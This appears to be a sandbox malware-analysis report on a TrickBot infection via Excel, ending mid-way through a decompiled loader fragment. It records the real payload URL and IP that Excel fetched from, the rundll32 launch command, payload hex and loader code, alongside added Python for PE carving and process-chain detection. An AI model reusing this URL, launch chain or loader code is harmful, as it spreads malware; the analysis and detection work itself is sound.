                                                                                                                                                                  Apr 12, 2021 17:12:29.805488110 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805504084 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805515051 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805521011 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805543900 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805543900 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805560112 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805577040 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805591106 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805593014 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805613995 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805625916 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805632114 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805644989 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805658102 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805658102 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805675030 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805691004 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805701017 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805706978 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805722952 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805738926 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805751085 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805753946 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805778980 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805808067 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.934176922 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934207916 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934220076 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934232950 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934338093 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934376955 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.934391022 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934431076 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.934470892 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935045004 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935061932 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935079098 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935096025 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935107946 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935115099 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935132980 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935149908 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935162067 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935187101 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935203075 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935209990 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935219049 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935235023 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935240030 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935250998 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935262918 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935266972 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935282946 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935303926 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935305119 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935321093 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935348034 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935372114 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936494112 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936517000 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936531067 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936547041 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936563015 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936579943 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936598063 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936613083 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936615944 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936631918 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936652899 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936661005 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936669111 CEST804971464.207.186.30192.168.2.3

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 17:12:10.166270971 CEST | 192.168.2.3 | 8.8.8.8 | 0xda23 | Standard query (0) | clientconfig.passport.net | A (IP address) | IN (0x0001)
Apr 12, 2021 17:12:28.505542040 CEST | 192.168.2.3 | 8.8.8.8 | 0xd09 | Standard query (0) | living-traditions.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 17:12:10.235234022 CEST | 8.8.8.8 | 192.168.2.3 | 0xda23 | No error (0) | clientconfig.passport.net | authgfx.msa.akadns6.net | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 17:12:28.651699066 CEST | 8.8.8.8 | 192.168.2.3 | 0xd09 | No error (0) | living-traditions.com | - | 64.207.186.30 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• living-traditions.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49714 | 64.207.186.30 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 17:12:28.785401106 CEST | 826 | OUT | GET /blogs/click.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: living-traditions.com
Connection: Keep-Alive
Apr 12, 2021 17:12:29.014661074 CEST | 979 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Apr 2021 15:12:28 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.25
Content-Disposition: attachment; filename="SQCTO.perclick"
X-Powered-By: PleskLin
                                                                                                                                                                  Data Ascii: EufnEufnEfnuEfnuEfnuEfnuEut3fnhj5Eu4fnEufnjh05PEju0fn=EuP3fn
                                                                                                                                                                  Apr 12, 2021 17:12:29.014695883 CEST981INData Raw: 8a 84 0d d8 fd ff ff 33 c2 88 84 0d d8 fd ff ff 41 c7 45 f4 c3 68 13 00 66 0f 6e 45 f4 f3 0f e6 c0 f2 0f 11 45 f0 c7 45 f4 c3 68 13 00 3b 0d 14 90 00 10 72 b1 ba c3 68 13 00 a1 14 90 00 10 fe c3 8b 4d 08 66 0f 6e c2 f3 0f e6 c0 89 5d d8 0f af c1
                                                                                                                                                                  Data Ascii: 3AEhfnEEEh;rhMfn]EUfnEPEA3EUfnEUEEfnEU3E5UhEfnEfnUEEEfnUEfnU
                                                                                                                                                                  Apr 12, 2021 17:12:29.014713049 CEST983INData Raw: 8a fc ff ff 66 0f 6e c7 33 c0 f3 0f e6 c0 f2 0f 11 45 f8 89 7d fc 5f 5b 8b e5 5d c3 55 8b ec 83 ec 38 53 bb c3 68 13 00 56 57 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 c8 89 5d cc 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 c8 89 5d cc 66 0f 6e c3 f3 0f e6 c0
                                                                                                                                                                  Data Ascii: fn3E}_[]U8ShVWfnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]Ef
                                                                                                                                                                  Apr 12, 2021 17:12:29.014733076 CEST984INData Raw: 00 c7 45 d4 c3 68 13 00 03 ce 66 0f 6e 45 d4 0f b7 1b f3 0f e6 c0 f2 0f 11 45 d0 66 0f 6e c0 f3 0f e6 c0 89 45 d4 f2 0f 11 45 d0 89 45 d4 8b 45 f0 35 a1 54 cc bf 3b d0 75 38 8b 04 99 ba c3 68 13 00 03 c6 a3 28 90 00 10 66 0f 6e c2 f3 0f e6 c0 f2
                                                                                                                                                                  Data Ascii: EhfnEEfnEEEE5T;u8h(fnEfnUEUME5T;u8h,fnEfnUEUME5T;u5h0fnEfnUEUM
                                                                                                                                                                  Apr 12, 2021 17:12:29.014750004 CEST985INData Raw: 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 f8 89 5d fc 8b 5d 14 85 db 74 06 8b 44 ca 7c 89 03 80 7d 0c 00 bb c3 68 13 00 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 f8 89 5d fc 0f 84 db 00 00 00 8d 04 3e e9 65 01 00 00 b9 64 86 00 00 66 3b c1 0f 85 d5 00 00 00
                                                                                                                                                                  Data Ascii: fnE]]tD|}hfnE]>edf;MfnEfn]E]9fnE];fnEfn]E]fnE]]t}
                                                                                                                                                                  Apr 12, 2021 17:12:29.014761925 CEST986INData Raw: f2 0f 11 45 dc 89 7d e0 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 89 7d e0 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f
                                                                                                                                                                  Data Ascii: E}fnE}fnEfn}Efn}Efn}Efn}E}dffnf#J]MffEfn}UEfn}E}EEEhfnEEE
                                                                                                                                                                  Apr 12, 2021 17:12:29.014777899 CEST987INData Raw: 32 30 30 30 0d 0a ec 0f b7 c1 89 45 f0 b8 c3 68 13 00 0f b7 f9 f3 0f e6 c0 f2 0f 11 45 f8 89 45 fc 66 83 f9 03 75 1c 8b f8 8b 45 14 01 03 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 89 7d 0c e9 7d 03 00 00 33 c9 41 66 3b f9 75 48 0f b7 0b 8b f8 8b 45
                                                                                                                                                                  Data Ascii: 2000EhEEfuEfnE}}3Af;uHEfnfEfn}Efn}E}-~JEfnEMUt'fnEfn}E}fnEM
                                                                                                                                                                  Apr 12, 2021 17:12:29.014792919 CEST988INData Raw: f3 0f e6 c0 ff 75 10 f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 ff 75 0c f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 50 8d 42 f8 d1 e8 50 f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 f2 0f 11 45 f4 66 0f 6e c1 f3 0f e6 c0 89 4d f8 f2
                                                                                                                                                                  Data Ascii: uEMfnuEMfnPBPEMfnEfnMEfnMEMMEhfnEQEEh.hfnEfnMEMt39],8GfnEMtfnEMf
                                                                                                                                                                  Apr 12, 2021 17:12:29.014842987 CEST990INData Raw: 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 e8 66 0f 6e c7 f3 0f e6 c0 89 7d ec f2 0f 11 45 e8 89 7d ec eb 03 33 db 43 66 0f 6e c7 8b c3 f3 0f e6 c0 f2 0f 11 45 e8 66 0f 6e c7 f3 0f e6 c0 89 7d ec f2 0f 11 45 e8 89 7d ec 5f 5e 5b 8b e5 5d c3 55 8b ec 51
                                                                                                                                                                  Data Ascii: fnEfn}E}3CfnEfn}E}_^[]UQQShVuW}fnEfn]E]$fnE]tefnE]FGfnEfn]Efn]E];tfnE]
                                                                                                                                                                  Apr 12, 2021 17:12:29.145554066 CEST994INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
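The raw stream above arrives with HTTP chunked transfer encoding: the body opens with the chunk-size line 1f27 (0x1f27 = 7975 bytes) immediately followed by the MZ header, and a second chunk-size line 2000 appears mid-stream, so the chunk framing has to be removed before the bytes parse as a PE. The Python below is an added example for this report, not Joe Sandbox output: it reassembles a chunked body, carves the PE and summarises the COFF header and section table. The sample response it builds is constructed; the COFF fields (i386, 5 sections, TimeDateStamp 0x60742b9a, DLL flag) and the section names, sizes and flags are copied from the header bytes in the dump, while the optional header is zero-filled apart from the PE32 magic and the chunk sizes are deliberately small so the framing is visible.

```python
"""Carve the downloaded PE out of a chunked HTTP body and summarise its headers.

Added example for this report (not Joe Sandbox code). Header values and section
table are taken from the dump; the optional header body and chunk sizes are constructed.
"""
import struct

IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section table as it appears in the dump:
# (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics)
SAMPLE_SECTIONS = [
    (b".text",  0x26af,  0x1000,  0x2800,  0x400,   0x60000020),
    (b".rdata", 0x244,   0x4000,  0x400,   0x2c00,  0x40000040),
    (b".data",  0x4038,  0x5000,  0x4200,  0x3000,  0xc0000040),
    (b".pdata", 0x667ff, 0xa000,  0x66800, 0x7200,  0xc0000040),
    (b".reloc", 0x80,    0x71000, 0x200,   0x6da00, 0x42000040),
]


def build_sample_pe() -> bytes:
    """Constructed PE32 headers with the values seen in the dump (no section bodies)."""
    e_lfanew = 0xd8
    dos = b"MZ" + b"\x00" * (0x3c - 2) + struct.pack("<I", e_lfanew)
    dos += b"\x00" * (e_lfanew - len(dos))
    # COFF header: i386, 5 sections, TimeDateStamp 0x60742b9a, 0xe0-byte optional header,
    # Characteristics 0x2102 = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL (a DLL, as rundll32 needs).
    coff = struct.pack("<IHHIIIHH", 0x4550, 0x14c, len(SAMPLE_SECTIONS), 0x60742b9a, 0, 0, 0xe0, 0x2102)
    opt = struct.pack("<H", 0x10b) + b"\x00" * (0xe0 - 2)  # PE32 magic, rest zeroed (constructed)
    secs = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vs, va, rs, rp, 0, 0, 0, 0, ch)
        for name, vs, va, rs, rp, ch in SAMPLE_SECTIONS
    )
    return dos + coff + opt + secs


def chunk_encode(body: bytes, sizes=(0x40, 0x100, 0x1000)) -> bytes:
    """Frame body as a chunked HTTP/1.1 message body: hex size CRLF data CRLF ... 0 CRLF CRLF."""
    out, pos, i = b"", 0, 0
    while pos < len(body):
        n = min(sizes[min(i, len(sizes) - 1)], len(body) - pos)
        out += f"{n:x}\r\n".encode() + body[pos:pos + n] + b"\r\n"
        pos, i = pos + n, i + 1
    return out + b"0\r\n\r\n"


def chunk_decode(stream: bytes) -> bytes:
    """Strip chunked framing; raise on malformed framing instead of guessing."""
    out, pos = b"", 0
    while True:
        end = stream.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size = int(stream[pos:end].split(b";")[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            return out
        if stream[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF (truncated capture?)")
        out += stream[pos:pos + size]
        pos += size + 2


def parse_pe(data: bytes) -> dict:
    """Parse DOS/COFF headers and the section table into a summary dict."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]
    sig, machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<IHHIIIHH", data, e_lfanew)
    if sig != 0x4550:
        raise ValueError("no PE signature")
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    sections, off = [], e_lfanew + 24 + opt_size
    for _ in range(nsec):
        name, vs, va, rs, rp, _, _, _, _, ch = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\x00").decode(), "vsize": vs, "va": va,
                         "rawsize": rs, "rawptr": rp, "chars": ch})
        off += 40
    return {"machine": machine, "timestamp": stamp, "is_dll": bool(chars & IMAGE_FILE_DLL),
            "pe32plus": magic == 0x20b, "sections": sections}


def suspicious_sections(pe: dict) -> list:
    """Flag W+X sections and large writable sections under names that normally hold read-only data."""
    hits = []
    for s in pe["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            hits.append((s["name"], "writable and executable"))
        if s["name"] in (".rdata", ".pdata") and s["chars"] & IMAGE_SCN_MEM_WRITE and s["rawsize"] >= 0x10000:
            hits.append((s["name"], f"writable, {s['rawsize']:#x} bytes; normally read-only and small"))
    return hits


def carve_from_response(stream: bytes) -> dict:
    """Dechunk the body, locate the MZ header and parse it."""
    body = chunk_decode(stream)
    start = body.find(b"MZ")
    if start < 0:
        raise ValueError("no PE in body")
    return parse_pe(body[start:])


if __name__ == "__main__":
    pe = carve_from_response(chunk_encode(build_sample_pe()))
    print(f"machine={pe['machine']:#x} dll={pe['is_dll']} stamp={pe['timestamp']:#x}")
    for s in pe["sections"]:
        print(f"  {s['name']:<7} va={s['va']:#07x} raw={s['rawsize']:#07x} chars={s['chars']:#010x}")
    for name, why in suspicious_sections(pe):
        print(f"  ! {name}: {why}")
```

Run against the sample and the section listing shows a 0x66800-byte read/write .pdata section in a 32-bit DLL whose .text is only 0x2800 bytes; x86 images do not carry an x64-style unwind table, so a section by that name holding most of the file is where to look for the packed stage. The optional header is not parsed beyond its magic because it is zeroed in the constructed sample; add the real field offsets when running this on a full capture.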


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 17:12:22
Start date: 12/04/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xf50000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:12:29
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\fdinmd.fii,StartW
Imagebase: 0xd0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 17:12:30
Start date: 12/04/2021
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\wermgr.exe
Imagebase:
File size: 209312 bytes
MD5 hash: FF214585BF10206E21EA8EBA202FACFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
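Read as a process tree, the three blocks above give a chain worth a detection rule: EXCEL.EXE (started through COM, hence /automation -Embedding) spawns rundll32 with a relative module path whose extension is .fii rather than .dll, and that rundll32 in turn starts wermgr.exe, a Windows Error Reporting binary that has no reason to be a child of rundll32. The Python below is an added example and not part of the report; it runs those checks over constructed process-creation events that mirror this tree. PIDs, images and command lines are taken from the report; the svchost.exe parent of EXCEL.EXE, its PID 900 and the benign shell32.dll control event are assumptions, and the field names follow Sysmon Event ID 1.

```python
"""Score process-creation events against the Office -> rundll32 -> wermgr.exe chain.

Added example for this report (not Joe Sandbox code). Events are constructed from the
Startup tree; the svchost.exe parent, PID 900 and the shell32 control are assumptions.
"""
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

EVENTS = [
    {"ProcessId": 6276, "ParentProcessId": 900,
     "Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\System32\svchost.exe",  # assumed parent for a COM launch
     "CommandLine": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"},
    {"ProcessId": 6624, "ParentProcessId": 6276,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": r"rundll32 ..\fdinmd.fii,StartW"},
    {"ProcessId": 6676, "ParentProcessId": 6624,
     "Image": r"C:\Windows\System32\wermgr.exe",
     "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"C:\Windows\system32\wermgr.exe"},
    {"ProcessId": 7000, "ParentProcessId": 900,  # constructed benign control
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rundll32_module(cmdline: str):
    """Module rundll32 was told to load: its first argument up to the ',EntryPoint' separator."""
    args = re.findall(r'"[^"]*"|\S+', cmdline)
    if len(args) < 2:
        return None
    return args[1].strip('"').split(",", 1)[0]


def is_absolute_windows_path(p: str) -> bool:
    return re.match(r"^(?:[A-Za-z]:\\|\\\\)", p) is not None


def ancestry(ev: dict, by_pid: dict) -> list:
    """Parent chain of ev (nearest first), walking the event map; guards against PID-reuse loops."""
    chain, pid, seen = [], ev["ParentProcessId"], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def score_event(ev: dict, by_pid: dict) -> list:
    """Return (rule, detail) findings for one process-creation event."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    hits = []
    if parent in OFFICE and image in LOLBINS:
        hits.append(("office_spawns_lolbin", f"{parent} -> {image}"))
    if image == "rundll32.exe":
        mod = rundll32_module(ev["CommandLine"])
        if mod and not mod.lower().endswith(".dll"):
            hits.append(("rundll32_non_dll_module", mod))
        if mod and not is_absolute_windows_path(mod):
            hits.append(("rundll32_relative_module", mod))
    if image == "wermgr.exe":
        if parent in LOLBINS or parent in OFFICE:
            hits.append(("wermgr_spawned_by_lolbin", f"{parent} -> {image}"))
        office = [basename(a["Image"]) for a in ancestry(ev, by_pid) if basename(a["Image"]) in OFFICE]
        if office:
            hits.append(("wermgr_descends_from_office", office[0]))
    return hits


def scan(events: list) -> dict:
    """Map PID -> findings for every event that produced at least one."""
    by_pid = {e["ProcessId"]: e for e in events}
    out = {}
    for e in events:
        hits = score_event(e, by_pid)
        if hits:
            out[e["ProcessId"]] = hits
    return out


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        for rule, detail in hits:
            print(f"pid {pid}: {rule}: {detail}")
```

ancestry() walks parents through the event map rather than trusting ParentImage alone, so the Office-to-wermgr rule still fires when the intermediate rundll32 has exited by the time the alert is evaluated; the seen set stops a walk that PID reuse would otherwise turn into a loop. Because Excel here was launched through COM automation, rules keyed on who started Office contribute nothing for this sample; the children carry the signal.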

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Code Analysis


                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:22.3%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                    Total number of Nodes:15
                                                                                                                                                                    Total number of Limit Nodes:1

                                                                                                                                                                    Graph

execution_graph

Nodes (node id, address, API calls):
  112  0x4063780  SetTimer
  113  0x4063797  GetMessageW
  114  0x40637ab
  115  0x40637bf  DispatchMessageW
  116  0x40637bd
  117  0x406380b  VirtualAlloc
  118  0x406382b  Sleep
  119  0x406383c
  120  0x4063852  CreateThread, SetTimer
  121  0x406387a  GetMessageW
  122  0x40638a0
  123  0x406388e
  124  0x40638a2  DispatchMessageW
  125  0x4070000
  126  0x407000e

Edges:
  112->113, 113->114, 113->116, 114->115, 114->116, 115->113,
  116->117, 116->119, 117->116, 117->118, 118->116,
  119->120, 120->121, 120->125, 121->122, 121->123, 123->122, 123->124, 124->121,
  125->126

                                                                                                                                                                    Callgraph

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E04063780() {
                                                                                                                                                                    				_Unknown_base(*)()* _v8;
                                                                                                                                                                    				void* _v12;
                                                                                                                                                                    				struct tagMSG _v40;
                                                                                                                                                                    				long _v44;
                                                                                                                                                                    				struct HWND__* _v48;
                                                                                                                                                                    				long _v52;
                                                                                                                                                                    				void* _v56;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				void* _t43;
                                                                                                                                                                    				int _t45;
                                                                                                                                                                    
                                                                                                                                                                    				SetTimer(0, 0, 0x25b, 0); // executed
                                                                                                                                                                    				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                                                                                                                                                                    					_v40.message = _v40.message + 1;
                                                                                                                                                                    					if(_v40.message != 0x114) {
                                                                                                                                                                    						DispatchMessageW( &_v40);
                                                                                                                                                                    						continue;
                                                                                                                                                                    					} else {
                                                                                                                                                                    					}
                                                                                                                                                                    					break;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                    				_v52 = 0x5000;
                                                                                                                                                                    				while(_v52 > 0x1000) {
                                                                                                                                                                    					_v52 = _v52 - 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v44 = _v52;
                                                                                                                                                                    				while(_v44 > 0x40) {
                                                                                                                                                                    					_v44 = _v44 - 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				do {
                                                                                                                                                                    					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                                                                                                                                                                    					_v8 = _t38;
                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                    						Sleep(0x1f4);
                                                                                                                                                                    					}
                                                                                                                                                                    				} while (_v8 == 0);
                                                                                                                                                                    				_v48 =  &(_v48->i);
                                                                                                                                                                    				E04063740(_v48, _v8);
